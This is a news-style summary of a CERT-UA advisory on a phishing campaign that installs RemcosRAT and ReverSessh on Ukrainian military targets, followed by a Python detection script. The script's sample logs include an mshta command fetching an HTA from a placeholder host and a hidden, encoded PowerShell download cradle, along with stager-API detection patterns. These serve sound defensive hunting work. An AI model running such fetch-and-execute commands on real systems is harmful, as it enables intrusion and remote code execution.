The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new cyberespionage campaign targeting members of the Ukrainian Armed Forces, orchestrated by a threat actor tracked as UAC-0184. The campaign uses phishing lures linked to themes of war and military operations to deploy the RemcosRAT and ReverSessh malware.
CERT-UA says it opened an investigation after a report from Trend Micro about suspicious files disguised as recruitment material for the 3rd Separate Assault Brigade and the Israel Defense Forces (IDF).
The investigation found that the threat actor uses the Signal messenger to distribute archives containing LNK (Windows shortcut) files. Opening a shortcut triggers a multi-stage infection chain that ultimately installs RemcosRAT and ReverSessh, giving the attackers unauthorized remote access to the compromised system.
Typically, each shortcut carries an obfuscated command that uses mshta.exe to fetch and run an HTA file, which in turn contains obfuscated VBScript. That VBScript runs PowerShell commands that decrypt (AES-128-ECB) and decompress (GZIP) an embedded payload and then launch the resulting PowerShell script.
The final stage downloads and executes the malicious payloads and opens a decoy document (PDF or DOCX) so the victim sees something plausible. The decoys are tailored to military personnel, with titles such as “Prisoner Interrogation,” “Geolocation Data,” “Encryption Commands,” and “Call Signs.”
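The mshta.exe-to-PowerShell hand-off in that chain is what a defender can hunt for in process-creation telemetry. The Python below is an added example written for this page, not code from CERT-UA, Trend Micro or the malware itself; the JSON-lines events, process IDs, paths, URL and encoded command are constructed for the demonstration and only loosely modelled on Sysmon Event ID 1 fields. It links every mshta.exe to its PowerShell descendants, records the indicators the advisory describes (an HTA or URL argument, a launch from Explorer as a double-clicked shortcut would produce, hidden/bypass/encoded PowerShell switches) and decodes -EncodedCommand so the stager's API calls can be inspected rather than hidden behind base64.

```python
"""Hunt for the LNK -> mshta.exe -> PowerShell chain over process-creation telemetry.

Added example. The events are constructed to look like Sysmon Event ID 1
(process create) records exported as JSON lines; every PID, path, URL and
command line below is made up for the demonstration, not taken from the campaign.
"""
import base64
import json
import re
from collections import defaultdict

# Constructed sample telemetry (hypothetical). Events 5120/5133 model the chain described
# in the advisory: Explorer launches a shortcut whose command runs mshta.exe against an
# HTA, and the HTA's VBScript spawns an encoded, hidden PowerShell stager. Events 6010
# and 6200 are benign lookalikes that the hunt must not report.
SAMPLE_LOG = r"""
{"ProcessId": 4100, "ParentProcessId": 1200, "Image": "C:\\Windows\\explorer.exe", "CommandLine": "C:\\Windows\\Explorer.EXE"}
{"ProcessId": 5120, "ParentProcessId": 4100, "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "\"C:\\Windows\\System32\\mshta.exe\" http://lure.example.invalid/call_signs.hta"}
{"ProcessId": 5133, "ParentProcessId": 5120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"}
{"ProcessId": 6010, "ParentProcessId": 4100, "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "\"C:\\Windows\\System32\\mshta.exe\" C:\\Tools\\inventory.hta"}
{"ProcessId": 6200, "ParentProcessId": 4100, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile -Command Get-Process"}
"""

# mshta.exe pointed at a URL or an .hta file (the shortcut's payload in the chain above).
MSHTA_CONTENT = re.compile(r"https?://|\.hta\b", re.IGNORECASE)
# PowerShell switches that hide the window, bypass policy, or carry an encoded body.
PS_FLAGS = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b"
    r"|(?:^|\s)-w(?:indowstyle)?\s+hidden\b"
    r"|(?:^|\s)-(?:ep|ex|executionpolicy)\s+bypass\b",
    re.IGNORECASE,
)
# APIs a decrypt/decompress/download stager needs (matched on the decoded script too).
PS_STAGE = re.compile(
    r"FromBase64String|GZipStream|AesManaged|Aes\]::Create|CreateDecryptor"
    r"|Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression",
    re.IGNORECASE,
)
ENC_BODY = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/undecodable."""
    m = ENC_BODY.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _image_is(event, name):
    return event["Image"].lower().endswith("\\" + name)


def parse_events(text):
    """Parse JSON-lines process-creation events (blank lines ignored)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_mshta_chains(events, max_depth=3):
    """Report every mshta.exe that has a PowerShell descendant within max_depth hops."""
    by_pid = {e["ProcessId"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ParentProcessId"]].append(e)

    findings = []
    for mshta in events:
        if not _image_is(mshta, "mshta.exe"):
            continue
        indicators = []
        if MSHTA_CONTENT.search(mshta["CommandLine"]):
            indicators.append("mshta_loads_hta_or_url")
        parent = by_pid.get(mshta["ParentProcessId"])
        if parent is not None and _image_is(parent, "explorer.exe"):
            # A shortcut opened from the desktop or an extracted archive runs under Explorer.
            indicators.append("launched_from_explorer")

        # Depth-first walk of descendants. VBScript inside the HTA spawning PowerShell is a
        # single hop, but allow a few more for cmd.exe or wscript.exe intermediaries.
        stack = [(child, 1) for child in children[mshta["ProcessId"]]]
        while stack:
            proc, depth = stack.pop()
            if _image_is(proc, "powershell.exe") or _image_is(proc, "pwsh.exe"):
                ps_indicators = []
                decoded = decode_encoded_command(proc["CommandLine"])
                if PS_FLAGS.search(proc["CommandLine"]):
                    ps_indicators.append("powershell_evasive_flags")
                if PS_STAGE.search(proc["CommandLine"]) or (decoded and PS_STAGE.search(decoded)):
                    ps_indicators.append("powershell_stager_api")
                # Any mshta -> PowerShell lineage is worth a ticket; indicators set the priority.
                findings.append({
                    "mshta_pid": mshta["ProcessId"],
                    "powershell_pid": proc["ProcessId"],
                    "indicators": indicators + ps_indicators,
                    "decoded_command": decoded,
                })
            if depth < max_depth:
                stack.extend((c, depth + 1) for c in children[proc["ProcessId"]])
    return findings


if __name__ == "__main__":
    for finding in find_mshta_chains(parse_events(SAMPLE_LOG)):
        print(json.dumps(finding, indent=2))
```

Run stand-alone it prints one finding for the 5120/5133 pair and nothing for the locally launched inventory HTA or the interactive PowerShell session. On a real host, replace SAMPLE_LOG with Sysmon or EDR process-creation events exported as JSON lines; the AES-128-ECB/GZIP decoding the advisory describes would surface through the AesManaged, CreateDecryptor and GZipStream patterns once the encoded body is decoded. Blocking mshta.exe for ordinary users through application control (AppLocker or WDAC) removes this first living-off-the-land stage entirely.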